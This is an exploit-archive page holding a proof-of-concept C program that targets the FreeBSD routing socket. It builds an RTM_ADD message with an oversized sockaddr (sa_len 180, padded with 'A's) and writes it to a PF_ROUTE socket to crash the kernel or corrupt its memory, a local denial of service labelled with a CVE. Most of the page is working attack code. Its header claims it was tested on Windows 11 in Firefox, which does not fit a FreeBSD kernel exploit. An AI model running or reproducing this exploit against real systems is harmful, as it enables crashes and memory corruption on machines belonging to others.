Share
## https://sploitus.com/exploit?id=PACKETSTORM:216221
=============================================================================================================================================
    | # Title     : FreeBSD Routing Socket Input Validation Analysis โ€“ Oversized sockaddr in RTM_ADD                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.freebsd.org/                                                                                                    |
    =============================================================================================================================================
    
    [+] Summary    :  PoC attempts to test the robustness of the FreeBSD routing socket subsystem by crafting a RTM_ADD message containing an 
                      intentionally oversized sockaddr structure (sa_len greater than the traditional sockaddr_storage limit of 128 bytes).
    				  
                      4 you https://packetstorm.news/files/id/216124/
    
    [+] POC   :  
    
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <net/route.h>
    #include <net/if.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <errno.h>
    
    #define ROUNDUP(a) \
        ((a) > 0 ? (1 + (((a) - 1) | (sizeof(long) - 1))) : sizeof(long))
    
    struct malicious_sockaddr {
        unsigned char  sa_len;    
        unsigned char  sa_family; 
        char           sa_data[254]; 
    };
    
    int main() {
        int s;
        char buf[1500];
        struct rt_msghdr *rtm;
        struct malicious_sockaddr *dst, *gw;
        int l;
    
        printf("[+] FreeBSD CVE-2026-3038 Local DoS PoC\n");
    
        s = socket(PF_ROUTE, SOCK_RAW, AF_UNSPEC);
        if (s < 0) {
            perror("[-] socket(PF_ROUTE) failed");
            return 1;
        }
    
        memset(buf, 0, sizeof(buf));
        rtm = (struct rt_msghdr *)buf;
        rtm->rtm_msglen = 0; 
        rtm->rtm_version = RTM_VERSION;
        rtm->rtm_type = RTM_ADD; 
        rtm->rtm_addrs = RTA_DST | RTA_GATEWAY;
        rtm->rtm_flags = RTF_UP | RTF_GATEWAY | RTF_STATIC;
        rtm->rtm_pid = getpid();
        rtm->rtm_seq = 42;
    
        dst = (struct malicious_sockaddr *)(rtm + 1);
        dst->sa_family = AF_INET;
        dst->sa_len = 180; 
        memset(dst->sa_data, 'A', 170);
    
        int dst_space = ROUNDUP(dst->sa_len);
        gw = (struct malicious_sockaddr *)((char *)dst + dst_space);
        gw->sa_family = AF_INET;
        gw->sa_len = sizeof(struct sockaddr_in);
        ((struct sockaddr_in *)gw)->sin_addr.s_addr = inet_addr("127.0.0.1");
    
        rtm->rtm_msglen = sizeof(struct rt_msghdr) + dst_space + ROUNDUP(gw->sa_len);
    
        printf("[*] Sending packet: msglen=%d, dst->sa_len=%d\n", rtm->rtm_msglen, dst->sa_len);
        printf("[!] Attempting to trigger kernel memory corruption...\n");
    
        if (write(s, buf, rtm->rtm_msglen) < 0) {
    
            fprintf(stderr, "[-] Result: %s\n", strerror(errno));
        } else {
            printf("[+] Packet accepted. If the system is vulnerable, it might crash now.\n");
        }
    
        close(s);
        return 0;
    }
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================